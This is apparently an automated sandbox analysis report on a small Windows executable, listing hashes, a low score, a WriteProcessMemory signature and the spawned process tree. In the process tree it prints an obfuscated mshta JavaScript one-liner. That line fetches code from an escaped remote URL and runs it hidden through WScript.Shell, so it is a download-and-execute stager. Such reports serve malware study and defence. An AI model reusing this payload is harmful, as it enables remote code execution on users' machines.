Analysis

  • max time kernel
    137s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-en
  • submitted
    02-09-2021 17:45

General

  • Target

    usfive_20210902-062006.exe

  • Size

    2KB

  • MD5

    3bf58fb4fd28cc6d24da20bbf69f337a

  • SHA1

    33b1f71be7a12af9d58fc288b5b8681da077629d

  • SHA256

    4b40eb7af466f9aada78a955661f611e45e288a89b6ebbbbd899ec0b5a41c3ae

  • SHA512

    dce815a730cf343ddcf6680ed8ab2b40d9cd9daa8bef72f8290e144fff86493fa34297946f53b814849afade4275d25c5adb43df12a014a8ffae3b86bfe052cf

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usfive_20210902-062006.exe
    "C:\Users\Admin\AppData\Local\Temp\usfive_20210902-062006.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();0;y=unescape('%320%33%7E%68t%74p%3A%2F%2Fa%73u%310%2Ef%75n%2Fh%72i%2F%3F%321%616%654%62%7E%330').split('~');240;try{x='WinHttp';235;x=new ActiveXObject(x+'.'+x+'Request.5.1');239;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);72;x.send();82;y='ipt.S';78;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);196;}catch(e){};2;;window.close();"
      2⤵
        PID:1944

    Network

    MITRE ATT&CK Matrix

    Downloads

    • memory/1944-53-0x0000000000000000-mapping.dmp
    • memory/1944-54-0x00000000764D1000-0x00000000764D3000-memory.dmp
      Filesize

      8KB